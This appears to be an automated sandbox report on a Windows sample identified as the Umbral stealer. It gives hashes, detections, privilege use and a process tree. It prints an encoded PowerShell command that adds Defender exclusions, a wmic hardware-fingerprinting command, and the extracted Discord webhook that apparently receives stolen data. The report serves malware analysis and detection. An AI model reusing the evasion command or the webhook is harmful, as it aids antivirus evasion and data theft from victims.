Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 02:03
Static task
static1
Behavioral task
behavioral1
Sample
idk2.exe
Resource
win7-20231129-en
General
-
Target
idk2.exe
-
Size
235KB
-
MD5
d68fd8be41d485b139ea640cabdf67f5
-
SHA1
84b9aaf719f73475cd38734229bd3bba02ddbf71
-
SHA256
68d09f04adfbf4e1f6735771a83da8b3869e236dc2154bb3ae89ccc03e10abf4
-
SHA512
b457364be0e9ec42cdf1d486ed2ce54e8f1df309fd817fc708802476b37b6b630b9dcbf334d7476c9b83e9ccb06df66a2eed4afad42b50d3d7a64c95adc8df4d
-
SSDEEP
6144:7eWRxYAv9MFiTC6SxlcACBT+jAtGSAdd2ylRHnry6oYCX:711MFUuxDGwJd2ylhnG6oYCX
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1204944287041847307/aoa_S28cr8V4g11xswAZC9SdvRJS8ygczDK-GfItmMFXCcL2edroJI5lraSE-OISlf6d
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000014825-5.dat family_umbral behavioral1/memory/2884-6-0x00000000000E0000-0x0000000000120000-memory.dmp family_umbral -
Executes dropped EXE 1 IoCs
pid Process 2884 Umbral.exe -
Loads dropped DLL 1 IoCs
pid Process 3040 idk2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 2884 Umbral.exe Token: SeIncreaseQuotaPrivilege 2568 wmic.exe Token: SeSecurityPrivilege 2568 wmic.exe Token: SeTakeOwnershipPrivilege 2568 wmic.exe Token: SeLoadDriverPrivilege 2568 wmic.exe Token: SeSystemProfilePrivilege 2568 wmic.exe Token: SeSystemtimePrivilege 2568 wmic.exe Token: SeProfSingleProcessPrivilege 2568 wmic.exe Token: SeIncBasePriorityPrivilege 2568 wmic.exe Token: SeCreatePagefilePrivilege 2568 wmic.exe Token: SeBackupPrivilege 2568 wmic.exe Token: SeRestorePrivilege 2568 wmic.exe Token: SeShutdownPrivilege 2568 wmic.exe Token: SeDebugPrivilege 2568 wmic.exe Token: SeSystemEnvironmentPrivilege 2568 wmic.exe Token: SeRemoteShutdownPrivilege 2568 wmic.exe Token: SeUndockPrivilege 2568 wmic.exe Token: SeManageVolumePrivilege 2568 wmic.exe Token: 33 2568 wmic.exe Token: 34 2568 wmic.exe Token: 35 2568 wmic.exe Token: SeIncreaseQuotaPrivilege 2568 wmic.exe Token: SeSecurityPrivilege 2568 wmic.exe Token: SeTakeOwnershipPrivilege 2568 wmic.exe Token: SeLoadDriverPrivilege 2568 wmic.exe Token: SeSystemProfilePrivilege 2568 wmic.exe Token: SeSystemtimePrivilege 2568 wmic.exe Token: SeProfSingleProcessPrivilege 2568 wmic.exe Token: SeIncBasePriorityPrivilege 2568 wmic.exe Token: SeCreatePagefilePrivilege 2568 wmic.exe Token: SeBackupPrivilege 2568 wmic.exe Token: SeRestorePrivilege 2568 wmic.exe Token: SeShutdownPrivilege 2568 wmic.exe Token: SeDebugPrivilege 2568 wmic.exe Token: SeSystemEnvironmentPrivilege 2568 wmic.exe Token: SeRemoteShutdownPrivilege 2568 wmic.exe Token: SeUndockPrivilege 2568 wmic.exe Token: SeManageVolumePrivilege 2568 wmic.exe Token: 33 2568 wmic.exe Token: 34 2568 wmic.exe Token: 35 2568 wmic.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3040 wrote to memory of 2108 3040 idk2.exe 28 PID 3040 wrote to memory of 2108 3040 idk2.exe 28 PID 3040 wrote to memory of 2108 3040 idk2.exe 28 PID 3040 wrote to memory of 2108 3040 idk2.exe 28 PID 3040 wrote to memory of 2884 3040 idk2.exe 30 PID 3040 wrote to memory of 2884 3040 idk2.exe 30 PID 3040 wrote to memory of 2884 3040 idk2.exe 30 PID 3040 wrote to memory of 2884 3040 idk2.exe 30 PID 2884 wrote to memory of 2568 2884 Umbral.exe 32 PID 2884 wrote to memory of 2568 2884 Umbral.exe 32 PID 2884 wrote to memory of 2568 2884 Umbral.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\idk2.exe"C:\Users\Admin\AppData\Local\Temp\idk2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAdQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZgBiACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD5009a51785bd54b63d28cdb374b8d1ece
SHA150cb71de5001b403eb54091669ae6898cc9ba72d
SHA2564676596a95f354bdcd99548f7fdcaef5f84e291f21d9744548dec99551db81c3
SHA512a5125cf0662caf5b595b4540e241fc6a2a5463bed25ee3c68b0350f2be4c1ed2b62eb96d37ecb8e40751403e56c81d8fc0989909052df36397d2080deefb36f8